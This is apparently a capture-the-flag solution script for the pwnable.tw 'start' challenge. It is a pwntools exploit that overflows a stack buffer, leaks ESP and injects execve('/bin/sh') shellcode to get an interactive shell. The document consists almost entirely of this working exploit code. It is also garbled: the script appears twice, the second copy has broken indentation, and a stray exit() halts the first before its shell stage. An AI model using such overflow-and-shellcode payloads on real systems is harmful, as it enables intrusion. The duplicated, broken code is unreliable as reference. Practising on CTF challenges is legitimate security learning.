morentharia/pwn_work_like_charm.py

## pwn_work_like_charm.py
from pwn import *

# 0x08048087      mov ecx, esp
# 0x08048089      mov dl, 0x14
# 0x0804808b      mov bl, 1
# 0x0804808d      mov al, 4


def leak_esp(r):
	address_1 = p32(0x08048087)
	payload = 'A'*20 + address_1
	print r.recvuntil('CTF:')
	r.send(payload)
	esp = u32(r.recv()[:4])
	print "Address of ESP: ", hex(esp)
	return esp

shellcode = asm('\n'.join([
    'push %d' % u32('/sh\0'),
    'push %d' % u32('/bin'),
    'xor edx, edx',
    'xor ecx, ecx',
    'mov ebx, esp',
    'mov eax, 0xb',
    'int 0x80',
]))

if __name__ == "__main__":
    context.arch = 'i386'
    # r = remote('chall.pwnable.tw', 10000)
    r = process("./start")
    gdb.attach(r)
    esp = leak_esp(r)

    exit()
    payload = "A"*20  + p32(esp + 20) + shellcode
    r.send(payload)
    r.interactive()
	from pwn import *

	# 0x08048087 mov ecx, esp
	# 0x08048089 mov dl, 0x14
	# 0x0804808b mov bl, 1
	# 0x0804808d mov al, 4



	def leak_esp(r):
	address_1 = p32(0x08048087)
	payload = 'A'*20 + address_1
	print r.recvuntil('CTF:')
	r.send(payload)
	esp = u32(r.recv()[:4])
	print "Address of ESP: ", hex(esp)
	return esp

	shellcode = asm('\n'.join([
	'push %d' % u32('/sh\0'),
	'push %d' % u32('/bin'),
	'xor edx, edx',
	'xor ecx, ecx',
	'mov ebx, esp',
	'mov eax, 0xb',
	'int 0x80',
	]))

	if __name__ == "__main__":
	context.arch = 'i386'
	# r = remote('chall.pwnable.tw', 10000)
	r = process("./start")
	gdb.attach(r)
	esp = leak_esp(r)

	exit()
	payload = "A"*20 + p32(esp + 20) + shellcode
	r.send(payload)
	r.interactive()